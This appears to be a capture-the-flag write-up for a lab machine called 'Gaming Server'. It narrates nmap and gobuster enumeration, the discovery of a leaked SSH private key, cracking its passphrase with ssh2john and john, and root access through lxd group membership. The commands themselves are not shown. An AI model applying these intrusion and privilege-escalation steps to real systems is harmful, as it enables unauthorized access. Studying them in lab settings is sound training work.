Gaming Server
Reconnaissance
Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)
Detailed Nmap Scan :
Command Breakdown:
(-sV): Service version
(-sC): Default nmap scripts
(-p): Specifying ports 22,80
(-oN nmap): Saving it into a files called nmap
Enumeration
Lets visit the website
Its a very functional website and nothing of interest at first glance so looking at the source code we see something interesting.
We have a username John
, lets run gobuster to find hidden directories and pages.
We find two directories, the secret directory looks like it has more file so lets run a gobuster scan against it.
Lets now go explore these directories
The uploads directory looks like directory that contains files that have been uploaded to the web server. Lets download the three files we see here.
Lets look at the files
First the dict.lst
file: it looks like a password list. The second file is interesting to read but nothing that will help us and the third file is a meme.
Now lets look at the secret directory
Lets download this file
Lets read the file
It a rsa private key, so lets use ssh2john
to get the password and then login through ssh
Exploitation
Lets use ssh2john
to get the hash so that we can use john to crack the password
Now lets crack the password
We found the password, so lets login through ssh, but first we have step
And now we can login
We can now read the user.txt
file.
Privilege Escalation
Lets run the id command as we cannot run the sudo command as we do not have the password john.
Looking closely we can see that john is part of the lxd group
. lxd is a Linux container manager that can be used to mount the root folder on the host machine. There is an article on this topic which talks about and shows us how to privilege escalate to root with the current permissions we have. I highly recommend reading the article as they explain it very well.
These are the steps that we have to follow. So first we need to download the alpine image on our machine as I think we can't download files on the victim machine directly , this can be found here.
Now we have to change directories into the directory we just cloned and then run build-alpine
.
After running it, a tar.gz
file is created, now we have to transfer this to the victim machine so lets start a http server so that we can download the file using wget
.
Now lets go to the victim machine and download the file
First change directories into the tmp folder as we are going to place all temporary files here.
Now that the image is built, it can added as an image to LXD
, we can do that by using this command
Lets check the list of images using this command
Now we need to use the following commands to escalate privileges to root
Now you are root and can read the root flag which you can find here.
Last updated